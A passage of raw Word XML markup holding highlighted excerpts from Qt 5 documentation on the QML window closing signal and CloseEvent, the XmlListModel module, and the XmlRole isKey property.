            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>closing</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>signal</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> will be emitted. You can force the window to stay open (for example to prompt the user to save changes) by writing an</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>onClosing</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>handler</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and setting</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>close.accepted = false</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C72653" w:rsidRPr="00C72653" w:rsidRDefault="00C72653" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B046D" w:rsidRPr="001B046D" w:rsidRDefault="00490E7E" w:rsidP="001B046D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1609" w:history="1">
        <w:r w:rsidR="001B046D" w:rsidRPr="001B046D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qml-qtquick-window-closeevent.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:bookmarkStart w:id="1319" w:name="_Toc382058614"/>
    </w:p>
    <w:p w:rsidR="001B046D" w:rsidRPr="001B046D" w:rsidRDefault="001B046D" w:rsidP="00BE3BBD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1320" w:name="_Toc483000810"/>
      <w:bookmarkStart w:id="1321" w:name="_Toc483003808"/>
      <w:bookmarkStart w:id="1322" w:name="_Toc483604159"/>
      <w:bookmarkStart w:id="1323" w:name="_Toc483605379"/>
      <w:r w:rsidRPr="00BE3BBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CloseEvent QML Type</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1320"/>
      <w:bookmarkEnd w:id="1321"/>
      <w:bookmarkEnd w:id="1322"/>
      <w:bookmarkEnd w:id="1323"/>
    </w:p>
    <w:p w:rsidR="001B046D" w:rsidRPr="001B046D" w:rsidRDefault="001B046D" w:rsidP="001B046D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Notification </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE3BBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>that a window is about to be closed by the windowing system</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g. the user clicked the title bar close button). The</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1610" w:history="1">
        <w:r w:rsidRPr="001B046D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>CloseEvent</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>contains an accepted property which can be set to false to abort closing the window.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B046D" w:rsidRDefault="001B046D" w:rsidP="001B046D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="1319"/>
    <w:p w:rsidR="001B046D" w:rsidRPr="001B046D" w:rsidRDefault="001B046D" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://doc.qt.io/qt-5/qtquick-xmllistmodel-qmlmodule.html" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://doc.qt.io/qt-5/qtquick-xmllistmodel-qmlmodule.html</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B046D" w:rsidRPr="001B046D" w:rsidRDefault="001B046D" w:rsidP="00BE3BBD">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1324" w:name="_Toc483000812"/>
      <w:bookmarkStart w:id="1325" w:name="_Toc483003810"/>
      <w:bookmarkStart w:id="1326" w:name="_Toc382058615"/>
      <w:bookmarkStart w:id="1327" w:name="_Toc483604160"/>
      <w:bookmarkStart w:id="1328" w:name="_Toc483605380"/>
      <w:r w:rsidRPr="00BE3BBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick XmlListModel QML Types</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1324"/>
      <w:bookmarkEnd w:id="1325"/>
      <w:bookmarkEnd w:id="1327"/>
      <w:bookmarkEnd w:id="1328"/>
    </w:p>
    <w:p w:rsidR="001B046D" w:rsidRPr="001B046D" w:rsidRDefault="001B046D" w:rsidP="001B046D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This QML module contains </w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>types for creating models from XML data</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B046D" w:rsidRPr="001B046D" w:rsidRDefault="001B046D" w:rsidP="001B046D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">To use the types in this module, </w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the module with the following line:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B046D" w:rsidRPr="001B046D" w:rsidRDefault="001B046D" w:rsidP="001B046D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:hyperlink r:id="rId1611" w:history="1">
        <w:r w:rsidRPr="001B046D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>QtQuick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">XmlListModel </w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>2.0</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9089"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420"/>
        <w:gridCol w:w="5669"/>
      </w:tblGrid>
      <w:tr w:rsidR="001B046D" w:rsidRPr="002230B8" w:rsidTr="001B046D">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B046D" w:rsidRPr="001B046D" w:rsidRDefault="00490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1612" w:history="1">
              <w:r w:rsidR="001B046D" w:rsidRPr="001B046D">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>XmlListModel</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B046D" w:rsidRPr="001B046D" w:rsidRDefault="001B046D">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001B046D">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>For specifying a read-only model using XPath expressions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B046D" w:rsidRPr="002230B8" w:rsidTr="001B046D">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B046D" w:rsidRPr="001B046D" w:rsidRDefault="00490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1613" w:history="1">
              <w:r w:rsidR="001B046D" w:rsidRPr="001B046D">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>XmlRole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B046D" w:rsidRPr="001B046D" w:rsidRDefault="001B046D">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001B046D">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>For specifying a role to an XmlListModel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="1326"/>
    </w:tbl>
    <w:p w:rsidR="001B046D" w:rsidRPr="002736BE" w:rsidRDefault="001B046D" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B046D" w:rsidRPr="00F413C2" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1614" w:history="1">
        <w:r w:rsidR="001B046D" w:rsidRPr="00F413C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qml-qtquick-xmllistmodel-xmlrole.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="001B046D" w:rsidRPr="001B046D" w:rsidRDefault="001B046D" w:rsidP="001B046D">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0" w:after="240" w:line="276" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1329" w:name="_Toc483000813"/>
      <w:bookmarkStart w:id="1330" w:name="_Toc483003811"/>
      <w:bookmarkStart w:id="1331" w:name="_Toc382058616"/>
      <w:bookmarkStart w:id="1332" w:name="_Toc483604161"/>
      <w:bookmarkStart w:id="1333" w:name="_Toc483605381"/>
      <w:r w:rsidRPr="00BE3BBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>XmlRole QML Type</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1329"/>
      <w:bookmarkEnd w:id="1330"/>
      <w:bookmarkEnd w:id="1332"/>
      <w:bookmarkEnd w:id="1333"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="14310" w:type="dxa"/>
        <w:tblBorders>
          <w:bottom w:val="single" w:sz="12" w:space="0" w:color="EEEEEE"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="14310"/>
      </w:tblGrid>
      <w:tr w:rsidR="001B046D" w:rsidRPr="001B046D" w:rsidTr="001B046D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="75" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="001B046D" w:rsidRPr="001B046D" w:rsidRDefault="001B046D">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="1334" w:name="isKey-prop"/>
            <w:bookmarkEnd w:id="1334"/>
            <w:r w:rsidRPr="002736BE">
              <w:rPr>
                <w:rStyle w:val="name"/>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>isKey</w:t>
            </w:r>
            <w:r w:rsidRPr="001B046D">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="001B046D">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="001B046D">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="001B046D">
              <w:rPr>
                <w:rStyle w:val="type"/>
                <w:color w:val="404244"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>bool</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="001B046D" w:rsidRPr="001B046D" w:rsidRDefault="001B046D" w:rsidP="001B046D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Defines whether this is a </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>key role.</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Key roles are </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE3BBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>used to determine whether a set of values should be updated or added</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XML list model</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> when</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1615" w:anchor="reload-method" w:history="1">
        <w:r w:rsidRPr="001B046D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>XmlListModel::reload()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
